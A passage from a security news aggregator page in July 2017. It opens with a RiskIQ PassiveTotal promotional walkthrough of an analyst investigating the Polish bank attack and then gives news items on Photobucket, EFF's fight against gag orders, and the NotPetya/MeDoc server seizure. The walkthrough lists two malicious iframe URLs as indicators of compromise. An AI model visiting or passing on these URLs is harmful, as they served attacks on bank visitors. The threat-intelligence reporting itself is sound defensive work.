1. John takes the flagged IP and queries it inside the RiskIQ PassiveTotal platform. Immediately, the WHOIS and passive DNS data are presented in a visual heat map.

2. Utilizing the heatmap, John can pinpoint and narrow down his investigation based on unique changes. All historical IP/Domain resolutions are displayed under resolutions allowing John to quickly observe all historical resolutions in a single view:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-5 Querying the IP combines all six sources in the old method into one

3. John pivots from the domain under the ‘resolutions’ tab, which automatically will run a query on ‘sap[.]misapor[.]ch’:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-6 Querying DNS data in RiskIQ PassiveTotal

The RiskIQ PassiveTotal interface displays detailed contextual information such as OSINT, RiskIQ proprietary BlackList, Malware and more, allowing John to stay inside of the platform to conduct his investigation further. The entire process is seamless and took less than a few minutes without ever having to leave the platform.

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-7 Data shows that threat analysts who use RiskIQ PassiveTotal save time

As seen above, by using RiskIQ PassiveTotal the time spent on this investigation was cut by more than half. On top of time savings, RiskIQ PassiveTotal aggregates data into one single view, so threat analysts like John no longer need to visit or subscribe to multiple sources.

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-8 Data shows that threat analysts enjoy RiskIQ PassiveTotal’s comprehensive data

In addition to the datasets presented above, RiskIQ PassiveTotal has many unique datasets derived from data captured during our virtual user crawling sessions. For example, the Host Pairs dataset is generated when RiskIQ crawling infrastructure identifies references or redirections on a page to other websites. By confirming that the attack originated from external sources, Host Pairs played a huge role in the investigation of Polish Bank hack when it showed that the malicious domain (sap[.]misapor[.]ch) was linked to a legitimate Polish bank via an iframe.

Below, you can see RiskIQ crawlers observed the KNF website pointing to two malicious URLS via an iframe:

[http]://sap.misapor.ch/vishop/view.jsp?pagenum=1
And [https]://www.eye-watch.in/design/fancybox/Pnf.action

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-9 The unique Host Pairs data set shows iframes pointing to external sources

About RiskIQ PassiveTotal for Threat Analysts

RiskIQ PassiveTotal’s ever-expanding data provides new context to adversaries’ infrastructure and now includes deeper monitoring capabilities. Security teams can be alerted in real-time to changes in DNS and domain resolution, WHOIS registration, and the appearance of other new keywords of interest. The latest release also includes a project workflow to quickly organize and group related threat infrastructure components found during investigations. This allows threat analysts and research teams to be more efficient and agile in their investigations. To try it for yourself, sign up for RiskIQ Community Today.

The post Threat Analyst Using RiskIQ PassiveTotal: A Day in the Life appeared first on RiskIQ.

Photobucket replaces millions of images with 'ransom demand'

July 05, 2017 03:21 PM - CSO Online -

If you’ve been shopping online over the last week or so, you may have run across listings that do not include an image of the product but do include a Photobucket error message image. That’s because the company quietly did away with free image embedding on third-party websites. It’s a move that is being compared to Photobucket holding its users’ photos for ransom.

Over the last 14 years, Photobucket claims to have hosted over 15 billion images for 100 million registered users, serving up more than “120 billion photos and videos to over three million websites.” The difference in the number of the photos served as opposed to hosted is because a user may embed the same image on multiple shopping sites, such as eBay, Amazon and Etsy, as well as on forums and other sites. By doing away with free hotlinking, Photobucket has effectively broken billions of images on the internet.

To read this article in full or to leave a comment, please click here

EFF, Access Now, CDT, and OTI Fight Back Against “Secret” Search Warrants

July 05, 2017 03:00 PM - EFF Deeplinks -

Can the government stop you from finding out it’s been looking through your private Facebook content as part of a “secret” investigation that’s not actually secret? That’s the question raised by an alarming case pending in the Washington D.C. Court of Appeals. Facebook has described the investigation as "known to the public," and the timing and venue match the January 20th, 2017 Presidential Inauguration protests (known as “J20”), the investigation of which is indeed quite public. But even if the warrants pertain to another investigation, the government should not be allowed to impose gag orders with respect to any information that is already publicly known.

Last week, EFF led a group of civil society organizations that included Access Now, the Center for Democracy and Technology, and New America’s Open Technology Institute in filing a brief demanding that the court apply a stringent constitutional test before enforcing gag orders accompanying a number of secret search warrants. We argued that the First Amendment rarely if ever allows gag orders in such cases, where the government seeks to limit public scrutiny of high-profile and potentially politicized investigations. 

Here’s what we know: Facebook is fighting gags associated with several search warrants for user content. The company thinks this case is so important that it sent out a kind of bat signal to groups like EFF. Although the case is under seal, Facebook petitioned the D.C. Court of Appeals (the District’s highest court) to open the proceeding up to amicus briefs and to reveal that Facebook argues that “neither the government’s investigation nor its interest in Facebook user information” is a secret.

Although we can’t be sure, we have a hunch the search warrants are related to the J20 protests. On January 20, the day of President Trump’s inauguration, police in D.C. arrested hundreds of protesters, charging many with felony rioting. Over the last several months, the press has reported on the controversial and wide-ranging investigation into the protests, which apparently included police infiltration of planning meetings. Additionally, in late January, some defendants received notice from Facebook that their non-content account information had been subpoenaed by law enforcement. Their attorneys sought to quash those subpoenas, and we believe the timeline in this case suggests the government sought to get even more private information, including account content, using warrants to Facebook accompanied by gag orders.

Whether or not this case involves the J20 protests, the fact that Facebook says the underlying investigation is already public is almost certainly enough to strike down the gag orders. Government gags that prevent a provider from notifying its users are an example of prior restraints, which are the “most serious” and “least tolerable” infringement on First Amendment rights. As a result, the Supreme Court has said they are only constitutional if they meet the most “most exacting scrutiny.”

But despite the strong presumption against prior restraints, the government gets gag orders all the time. Two of the most commonly used gag authorities are National Security Letters, which EFF continues to challenge on appeal in the Ninth Circuit, and nondisclosure orders issued under the Stored Communications Act, 18 U.S.C. § 2705, at issue in this case.

There are strong arguments that Section 2705 nondisclosure orders are unconstitutional all or nearly all of time. Just in the last several months alone, Microsoft has sued to have Section 2705 declared unconstitutional on its face, while Adobe succeeded in convincing a court to strike down an indefinite Section 2705 gag.

But the apparently public nature of the investigation here makes the gags even more egregious. In order to uphold a prior restraint, a court must be satisfied that it is necessary to protect against a “a clear and present danger or a serious and imminent threat” to an important government interest. As we point out in our brief, if the government’s investigation into the Facebook accounts is already known, there’s no way that a gag can prevent any harm flowing from notifying the users and allowing them to challenge the search warrants. We point to examples from two cases in which the Supreme Court struck down gags that prevented the press from reporting sensitive information that had already been revealed in open court.

Although the docket is sealed, it’s our understanding that the court has set this case for oral argument in September 2017. We have requested an opportunity to address the court to represent the public’s interest in ensuring that prior restraints such as this don’t issue without the most exacting scrutiny our court system is prepared to provide. We will keep you informed of any updates we receive.

School board addresses second privacy breach at Collingwood Collegiate

July 05, 2017 02:56 PM - Office of Inadequate Security - Ian Adams reports: The Simcoe County District School Board has sent out another notice to parents of a potential privacy breach at Collingwood Collegiate Institute. On June 30, officials advised parents of a potential breach associated with a list of email addresses and phone numbers. Area 5 superintendent of education Jackie Kavanagh sent a letter [...]

Ukrainian cyberpolice seized MeDoc servers while hackers withdrawn Bitcoin from NotPetya wallet

July 05, 2017 02:42 PM - Security Affairs -

The Ukraine’s cyber police seized the MeDoc servers after detecting a new suspicious activity and fearing new malware-based attacks.

The Ukrainian authorities have seized equipment from the online accounting firm MeDoc which is suspected to have had a significant role in the recent NotPetya attack.

The Ukraine’s cyber police have seized the servers after detecting a new suspicious activity, the seizure is containment measure that was adopted to “immediately stop the uncontrolled proliferation” of malware.

NotPetya medoc company

According to the Associated Press’s Raphael Satter that quotes the Cyberpolice spokesperson Yulia Kvitko, the company’s systems had either sent or were ready to send out a new update that might have been compromised by hackers.

“Tax software firm M.E. Doc was raided to “immediately stop the uncontrolled proliferation” of malware. In a series of messages, Cyberpolice spokeswoman Yulia Kvitko suggested that M.E. Doc had sent or was preparing to send a new update and added that swift action had prevented any further damage.” states the AP. ““Our experts stopped (it) on time,” she said.”

MeDoc technical staff provided its equipment to the Ukraine Cyberpolice to allow further detailed analysis. While the Ukraine Cyberpolice is investigating the case, the authorities urge people stop using the MeDoc application. The experts suggest turning off any computers running the MeDoc software, change their login credentials and get new digital signatures.

Back to the NotPetya massive attack, Kaspersky Lab analyst Aleks Gostev confirmed that alleged attackers cash out the sum paid by the victims, the Bitcoin collected in the original attack has been withdrawn.

Roughly 3.96 Bitcoin ($10,382) was withdrawn from a wallet linked to NotPetya attack early on Wednesday morning.

Hackers used the money to pay for a Pastebin Pro account on the dark web, which was then used to post fresh ransomware drop instructions.

The AP closed its post reporting that Infrastructure Minister Volodymyr Omelyan told it his department had incurred “millions” in costs, with hundreds of workstations and two of its six servers knocked out.

Pierluigi Paganini 

(Security Affairs – MeDoc, NotPetya)

&https

The post Ukrainian cyberpolice seized MeDoc servers while hackers withdrawn Bitcoin from NotPetya wallet appeared first on Security Affairs.

Bad things happen to good people – but you can help stop that

July 05, 2017 02:34 PM - Naked Security - Who gets targeted by scammers, and how can we help them? We've got some tips to help you help others

Avoiding the Dark Side of AI-Driven Security Awareness

July 05, 2017 02:30 PM - Dark Reading - Can artificial intelligence bring an end to countless hours of boring, largely ineffective user training? Or will it lead to a surveillance state within our information infrastructures?

Bookmark and Share

Last updated (UTC):
July 07, 2017 12:18 AM

If you have any questions about this site, please contact me -